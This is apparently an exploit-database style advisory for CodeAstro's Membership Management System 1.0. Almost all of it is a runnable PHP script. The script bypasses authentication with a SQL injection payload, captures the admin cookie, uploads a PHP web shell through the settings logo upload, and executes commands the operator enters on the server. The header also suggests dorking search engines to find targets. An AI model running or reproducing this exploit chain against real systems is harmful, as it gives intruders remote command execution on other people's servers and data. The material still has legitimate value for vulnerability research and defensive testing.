=============================================================================================================================================
| # Title     : Membership Management System version 1.0 php code injection Vulnerability                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                                 |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload inject php code contains a back door.

[+] Line 20 Set your Target.

[+] save payload as poc.php

[+] usage from cmd : C:\www\test>php 1.php

[+] payload :

<?php
// Function to generate a random string of a given length
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
    return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);
}

// Generating a random web shell file
$shellFile = randomGen() . ".php";

// Creating a payload for the login
$payload = [
    'email' => "test@mail.com' or 0=0 #",  // Adjust based on the target
    'password' => 'a',
    'login' => ''
];

$session = curl_init();

// Target base URL (change this to your target IP or domain)
$urlBase = "http://127.0.0.1/Membership/";

// Login
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";

// Set cURL options for the POST request
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging

// Execute the login request
$response = curl_exec($session);

// Separate headers from body
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);

// Check if 'Set-Cookie' header is present in the headers
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
    $cookie = $matches[1][0];
}

// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;

if ($cookie) {
    echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
    echo "Set-Cookie header not found in the response.\n";
    exit();
}

// Prepare to upload shell
$url = $urlBase . "settings.php";

// Get user input for the command to execute
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));

// PHP code to execute the command received from the user
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";

// Prepare the multipart/form-data
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";

// Set cURL options for file upload
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
    'Content-Type: multipart/form-data; boundary=' . $boundary,
    'Cookie: ' . $cookie
]);

echo "=== Logging in and uploading shell " . $shellFile . " ===\n";

// Execute the upload request
$response = curl_exec($session);

// Close cURL session
curl_close($session);

// Curl the shell for testing
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";

echo "=== CURL OUTPUT ===\n";
echo file_get_contents($requestUrl);
?>

[+] 

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================